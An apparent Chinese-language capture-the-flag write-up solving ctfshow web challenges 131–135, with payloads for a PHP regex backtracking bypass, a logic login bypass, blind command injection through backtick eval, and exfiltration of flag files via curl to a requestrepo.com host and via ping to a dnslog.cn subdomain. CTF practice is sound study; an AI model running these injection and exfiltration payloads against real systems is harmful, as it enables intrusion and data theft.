1.web131

和上题一样差不多,正则最大回溯次数绕过

import requestsurl=""data={'f':'very'*250000+'360Dctfshow' } r=requests.post(url,data=data)print(r.text)

2.web132


通过扫描发现robots.txt,访问/admin发现源码

&&和||都是短路运算符
只要满足code和password是错的且code和username为admin即可得到flag
payload:

username=admin&password=aa&code=admin

3.web133

get传参 F=`$F `;sleep 3经过substr($F,0,6)截取后 得到`$F `;也就是会执行 eval("`$F `;");我们把原来的$F带进去eval("``$F `;sleep 3`");也就是说最终会执行` `$F `;sleep 3` == shell_exec("`$F `;sleep 3");前面的命令我们不需要管,但是后面的命令我们可以自由控制。这样就在服务器上成功执行了 sleep 3所以 最后就是一道无回显的命令执行题目了

写文件试了不行,应该是没权限
通过curl进行外带,curl只能带出一排数据,可以直接筛选flag进行带出
利用的平台是https://requestrepo.com/
payload:

F=`$F%20`;curl%20http://1gfmb9cm.requestrepo.com" />

4.web134

 string(3) “123” }也就是说现在的$_POST[‘a’]存在并且值为123题目中还有个extract($_POST)extract() 函数从数组中将变量导入到当前的符号表,也就是说把键名当作变量名,值作为变量的值这样的话 $a==123

payload:

_POST[key1]=36d&_POST[key2]=36d

5.web135


curl外带不行了,被过滤了还可以用ping外带
试一下写文件

1.访问1.txt即可F=`$F `;cp flag.php 1.txt 2.ping外带`cat flag.php|awk 'NR==2'`.6x1sys.dnslog.cnawk利用NR一排排的带数据

php特性